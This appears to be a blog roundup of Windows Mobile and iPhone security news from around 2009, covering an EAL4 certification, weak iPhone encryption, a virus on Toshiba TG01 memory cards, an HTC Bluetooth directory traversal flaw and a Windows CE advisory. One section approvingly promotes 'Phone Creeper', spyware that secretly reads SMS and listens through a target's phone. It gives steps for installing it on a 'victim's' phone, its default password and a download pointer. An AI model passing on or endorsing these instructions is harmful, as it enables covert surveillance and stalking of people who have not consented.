The DSD is the Australian Government’s national authority for information security. Windows Mobile 6.1 operating system have successful completed the Defence Signals Directorate (DSD) Australasian Information Security Evaluation Program and also has obtained Common Criteria Evaluation Assurance Level 4 (EAL4). ( EAL7 is the highest possible level )

By meeting the security criteria for EAL4, Windows Mobile 6.1 are accepted under the Common Criteria Recognition Arrangement (CCRA) by Australia and 25 other countries worldwide including the United Kingdom and the United States. The CCRA ensures that evaluations of IT products are performed to high and globally consistent standards. Thus, this certification provides government and enterprise customers with definitive information about the security features in Windows Mobile 6.1, and assurance that mobile workers can securely access sensitive data on information networks.

Mike Burgess, first assistant secretary, Information Security, Defence Signals Directorate, said, “We have worked very closely with Microsoft throughout this assessment process to ensure that Windows Mobile 6.1 meets the security needs for government and enterprise networks.”

via windowsteamblog.com

Here is an iPhone Story that many wont tell you. According to Jonathan Zdziarski,, an iPhone developer and a hacker who teaches forensics courses on recovering data from iPhones, claims that the enterprise-friendly encryption included with the iPhone 3GS is so weak it can be cracked in two minutes with a few pieces of readily available freeware. In a recent report from wired.com He claims that “It is kind of like storing all your secret messages right next to the secret decoder ring,” and also went on to say “I don’t think any of us have ever seen encryption implemented so poorly before, which is why it’s hard to describe why it’s such a big threat to security.”

Get more info about the iPhone’s Encryption Flaws

According to MSMobile.com Toshiba TG01 Windows Mobile sold by O2 has a virus that is located in some memory cards that are delivered in package of Toshiba TG01. This virus has infected only devices sold in July 2009 and devices sold previously (sales of Toshiba TG01 started at O2 Germany in June) are not affected. This is the first time ever when virus software is encountered in a Windows Mobile phone that is commercially sold.

HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. HTC handsets running Windows Mobile 5 are not affected. Users worried about the vulnerability should avoid pairing their phones with an untrusted handset or computer. They may also want to delete any devices that are already paired with their phones. Because the driver, obexfile.dll, is an HTC driver, only handsets from the company are affected. Apparently Windows Mobile 6.5 devices will be vulnerable too if HTC does not fix the driver according to Moreno Tablado, who discovered this Vulnerability.

[ via PC World ]

More info about the Vulnerability

Phone Creeper which the author describes an an Espionage Suite has been recently released by chetstriker from xda-developers. I am thankful to the developer for pointing out such a vulnerability within the Windows Mobile operating system.

Currently it has the following features:

1. secretly and remotely read incoming / outgoing sms
2. secretly and remotely delete incoming / outgoing sms
3. secretly and remotely view call history
4. bounce sms messages off remote phone to someone else.
5. create a pop-up message on phone
6. send a secret fart sound
7. secretly and remotely listen to person. (Initiates silent call back of person to your phone with thier speaker phone enabled)
8. also send listening in call to somebody else’s phone

All results will be sent via SMS back without leaving any trace on the phone being controlled. Any cell phone can be used to initiate the commands and all commands will respond with a success message for acknowledgment.

Install Instructions :
Just install .cab on the victims wm5 or higher phone. THEN MAKE SURE YOU REBOOT TO INITIATE IT.
by default the password is “chetstriker“, obviously not including the quotes and BE SURE IT’S ALL IN LOWER CASE. The command format is (password and then command)

Download this Application

We dont usually find a lot of Security Vunerability on Mobile devices when compared to the desktop cousin but once in a while a few of them do surface.

A security vunerability for Windows CE posted in the US-CERT Cyber Security Bulletin.

Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted JPEG and GIF images.

For more details see National Vulnerability Database (CVE-2008-2160)

And update is available from Microsoft here.
Source : 4winmobile.com